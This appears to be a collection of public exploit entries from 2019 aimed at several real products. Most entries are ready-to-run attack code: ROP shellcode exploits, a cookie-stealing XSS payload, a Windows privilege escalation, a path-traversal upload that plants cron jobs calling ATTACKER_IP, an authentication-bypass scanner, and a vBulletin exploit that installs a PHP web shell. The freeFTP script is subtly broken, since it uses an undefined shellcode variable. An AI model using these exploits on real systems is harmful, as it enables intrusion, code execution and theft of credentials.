
  1. # Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP) # Google Dork: N/A # Date: 2019-10-06 # Exploit Author: max7253 # Vendor Homepage: http://www.mini-stream.net/ # Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe # Version: 3.1.3.7.2010.11.05 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC # CVE : N/A # Note: There is a similar exploit published but it doesn't work in the OS I used: # https://www.exploit-db.com/exploits/42963 # This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on. import struct file = 'fuzz_rop.asx' #Tested on #OS Name: Microsoft Windows 7 Enterprise #OS Version: 6.1.7601 Service Pack 1 Build 7601 #System Type: x64-based PC #msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python buf = b"" buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29" buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28" buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35" buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b" buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6" buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc" buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04" buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49" buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1" buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b" buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86" buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17" buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2" buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40" buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c" buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49" buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc" payload = 
"http://" payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11111111) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEFEEF) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll] payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll] payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of (# ADD ESP,8 # RETN) in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN #payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN ## Save 
memory protection code (0x40) in ECX payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN payload += struct.pack('<L', 0xFFFFFFFF) payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x1002D038) # RETN ## Save NOPs in EAX #payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] #payload += struct.pack('<L', 0x90909090) # nop ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()
  2. # Title: Subrion 4.2.1 - 'Email' Persistent Cross-Site Scripting # Date: 2019-10-07 # Author: Min Ko Ko (Creatigon) # Vendor Homepage: https://subrion.org/ # CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 # Website : https://l33thacker.com # Description : Allows XSS via the panel/members/ Username, Full Name, or # Email field, aka an "Admin Member JSON Update" issue. First log in to the panel with user credentials, then go to the Members tab in the left menu. http://localhost/panel/members/ Username, Full Name, Email are editable with a double click on them. Insert the following payload <img src=x onerror=alert(document.cookie)>
  3. # Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation # Date: 2019-01-30 # Exploit Author: Jakub Palaczynski # Vendor Homepage: https://www.checkpoint.com/ # Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514 # Version: Check Point ZoneAlarm <= 15.4.062.17802 # CVE: CVE-2019-8452 Description: ============ It is possible to change the permissions of an arbitrary file so that the user has full control over it after exploitation, which results in Local Privilege Escalation. It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses the tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log". All authenticated users have full control over this log file, and it was found that the Check Point service writes to it with SYSTEM privileges. However, this file could not be used for exploitation as it is always held open by the Check Point service; for example, this is why users cannot delete it in normal conditions (unless the service crashes and/or is restarted). However, it was noticed that when this log file reaches some limit (depending on the software) it is archived to the same location and name but with a ZIP extension. The same permissions are set for this archive file, so all authenticated users can access it. Taking all of this into account we can create an attack scenario: 1. If the tvDebug.zip file exists then delete it 2. Create a hardlink (using CreateHardlink.exe) named tvDebug.zip which points to another file that we would like to have permissions to (this file must not be held by another process when the Check Point service tries to use it) 3. Fill the tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using the software as a normal user. 4. Restart the system, as the service needs to be restarted to create the archive. 5. 
Now your file has permissions changed and you have all access to it. 6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one. 7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges. Proof of Concept: ================= # PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm. # file that we want to have permissions to # LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation $file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" # path to symboliclink testing tools CreateHardlink.exe # CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools $hardlink = "C:\Temp\CreateHardlink.exe" Write-Host "[!] Detecting Check Point software." if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) { $logfile = "$env:windir\Internet Logs\tvDebug.zip" Write-Host "[+] Check Point Endpoint Security found." } elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) { $logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip" Write-Host "[+] Check Point ZoneAlarm found." } else { Write-Host "[-] Check Point software was not found." } Write-Host "[!] Trying to delete tvDebug.zip file." if ([System.IO.File]::Exists($logfile)) { while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue } Write-Host "[+] Successfully deleted tvDebug.zip archive file." } else { Write-Host "[+] tvDebug.zip archive file was not found." } Write-Host "[!] Creating hardlink to a file that we would like to change permissions." 
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`"" while (!([System.IO.File]::Exists($logfile))) { Sleep 1 } Write-Host "[+] Hardlink successfully created." Write-Host "[!] 1. Fill log file up to the limit and restart computer." Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL." Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."
  4. # Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload # Date: 2018-12-11 # Exploit Authors: Jakub Palaczynski # Vendor Homepage: https://www.ibm.com/ # Version: IBM Bigfix Platform <= 9.5.9.62 # CVE: CVE-2019-4013 Description: ============ Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges. What caused this issue: * path traversal - it is possible to escape from original directory and upload file to any other location * server running with root privileges - user can upload file to ANY location on the system * upload any type of file - application does not verify extension and MIME type of uploaded files * authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set * possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved. Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable. URL needs to point to attacker's web server where he hosts for example script files. When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user. An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron. Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. 
Those two HTTP requests should be sent in loop to finally win a race and execute our script. Proof of Concept: ================= cron.txt served on attacker's web server: * * * * * root bash /tmp/icmp.sh icmp.txt served on attacker's web server: #!/bin/bash ping -c 3 ATTACKER_IP Uploading cron task: POST /swd/api/packages/upload HTTP/1.1 Host: XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 846 Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809 X-XSRF-TOKEN: XXX Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX Connection: close -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="fileURL" http://ATTACKER_IP/cron.txt -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="username" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="password" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlFileName" ../../../../../../../../etc/cron.d/task -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlDownloadAtRuntime" false -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="uploadId" user_1543410578364620 -----------------------------7289782871626994727576601809-- Uploading script file: POST /swd/api/packages/upload HTTP/1.1 Host: XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Content-Length: 846 Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809 X-XSRF-TOKEN: XXX Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX Connection: close -----------------------------7289782871626994727576601809 Content-Disposition: form-data; 
name="fileURL" http://ATTACKER_IP/icmp.txt -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="username" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="password" -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlFileName" ../../../../../../../../tmp/icmp.sh -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="urlDownloadAtRuntime" false -----------------------------7289782871626994727576601809 Content-Disposition: form-data; name="uploadId" user_1543410578364620 -----------------------------7289782871626994727576601809-- After a while our script should be executed with root privileges.
  5. # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow # Date: 2019-09-01 # Author: Chet Manly # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html # Version: 1.0.8 # CVE: N/A from ftplib import FTP buf = "" buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d" buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65" buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e" buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b" buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36" buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32" buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f" buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62" buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57" buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31" buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72" buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44" buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f" buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70" buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73" buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78" buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30" buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b" buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66" buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a" buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e" buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71" buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66" buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f" buf += 
"\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52" buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55" buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b" buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42" buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55" buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58" buf += "\x45\x35\x53\x30\x41\x41" buf = 'A' * 276 buf += '\x90' * 10 buf += shellcode buf += 'B' * (486 - len(shellcode)) buf += '\x58' # pop eax buf += '\xfe\xcc' # dec ah buf += '\xfe\xcc' # dec ah buf += '\xff\xe0' # jmp eax buf += 'C' * 4 buf += '\xe8\xf0\xff\xff\xff' # call near buf += 'D' * 9 buf += '\xeb\xf0\x90\x90' # jump backwards buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret buf += 'E' * (1000 - len(buf)) ftp = FTP() ftp.connect('192.168.1.1', 21) ftp.login('anonymous', buf)
  6. # Exploit Title: Zabbix 4.4 - Authentication Bypass # Date: 2019-10-06 # Exploit Author: Todor Donev # Software Link: https://www.zabbix.com/download # Version: Zabbix 4.4 # Tested on: Linux Apache/2 PHP/7.2 # # Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # Copyright 2019 (c) Todor Donev # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit # # [ Exploit Author: Todor Donev 2019 <[email protected]> # # [ Initializing the browser # # [ >>> Referer => # # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 # # [ >>> Content-Type => application/x-www-form-urlencoded # # [ <<< Cache-Control => no-store, no-cache, must-revalidate # # [ <<< Connection => close # # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Pragma => no-cache # # [ <<< Server => nginx # # [ <<< Vary => Accept-Encoding # # [ <<< Content-Type => text/html; charset=UTF-8 # # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT # # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT # # [ <<< Client-Peer => # # [ <<< Client-Response-Num => 1 # # [ <<< Client-SSL-Cert-Issuer => # # [ <<< Client-SSL-Cert-Subject => # # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256 # # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL # # [ <<< Client-SSL-Warning => Peer 
certificate not verified # # [ <<< Client-Transfer-Encoding => chunked # # [ <<< Link => <favicon.ico>; rel="icon"<assets/img/apple-touch-icon-76x76-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="76x76"<assets/img/apple-touch-icon-120x120-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="120x120"<assets/img/apple-touch-icon-152x152-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="152x152"<assets/img/apple-touch-icon-180x180-precomposed.png>; rel="apple-touch-icon-precomposed"; sizes="180x180"<assets/img/touch-icon-192x192.png>; rel="icon"; sizes="192x192"<assets/styles/dark-theme.css>; rel="stylesheet"; type="text/css" # # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly # # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload # # [ <<< Title => TARGET: Dashboard # # [ <<< X-Content-Type-Options => nosniff # # [ <<< X-Frame-Options => SAMEORIGIN # # [ <<< X-Meta-Author => Zabbix SIA # # [ <<< X-Meta-Charset => utf-8 # # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d # # [ <<< X-Meta-Msapplication-Config => none # # [ <<< X-Meta-Msapplication-TileColor => #d40000 # # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png # # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1 # # [ <<< X-UA-Compatible => IE=Edge # # [ <<< X-XSS-Protection => 1; mode=block # # [ # # [ The target is vulnerable. 
Try to open these links: # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1 # # [ https://TARGET/zabbix/overview.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1 # # [ https://TARGET/zabbix/latest.php?ddreset=1 # # [ https://TARGET/zabbix/charts.php?ddreset=1 # # [ https://TARGET/zabbix/screens.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1 # # [ https://TARGET/zabbix/srv_status.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1 # # [ https://TARGET/zabbix/hostinventories.php?ddreset=1 # # [ https://TARGET/zabbix/report2.php?ddreset=1 # # [ https://TARGET/zabbix/toptriggers.php?ddreset=1 # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list # # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1 # #!/usr/bin/perl -w use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; my $host = shift || ''; # Full path url to the store $host =~ s|/$||; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n"; print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n"; print "[ e.g. 
perl $0 https://target:port/\n" and exit if ($host !~ m/^http/); print "[ Initializing the browser\n"; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 }); $browser->timeout(30); $browser->agent($user_agent); my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request); print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names; print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names; print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401'); print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403'); if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){ print "[\n[ The target is vulnerable. Try to open these links:\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); for my $line (@files){ next if ($line->attr('href') =~ m/javascript/); next if ($line->attr('href') =~ m/\#/); next if ($line->attr('href') =~ m/http/); print "[ ", $host."/zabbix/".$line->attr('href'), "\n"; } } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }
  7. # Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change # Date: 2019-09-10 # Exploit Author: Alessandro Magnosi # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 #!/usr/bin/python # Steps to reproduce: # 1. Generate the payload executing the PoC # 2. Login in the Sricam DeviceViewer application as any registered user # 3. Go to System Tools -> Change Password # 4. Set the old password as the malicious payload, and the new password as whatever you want # 5. The password will be changed with the new one # 6. To confirm, restart the application and try to login with the new password payload = "A" * 5000 try: bypass = open("bypass.txt","w") print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass") print("### Author: Alessandro Magnosi\n") print("[*] Creating old password file") bypass.write(payload) bypass.close() print("[+] Old password file created\n") print("[i] When changing password, set the old password to the file contents") print("[i] Close the program and reopen it") print("[i] Log in with new password") except: print("[!] Error creating the file")
  8. <?php /* --------------------------------------------------------------------- vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability --------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "data[extension]" and "data[filedata]" parameters to the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used to update users' avatars. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the "Save Avatars as Files" option to be enabled (disabled by default). 
[-] Disclosure timeline: [30/09/2019] - Vendor notified [03/10/2019] - Patch released: https://bit.ly/2OptAzI [04/10/2019] - CVE number assigned (CVE-2019-17132) [07/10/2019] - Public disclosure */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); print "+-------------------------------------------------------------------------+"; print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n"; if ($argc != 4) { print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! 
Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>'; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
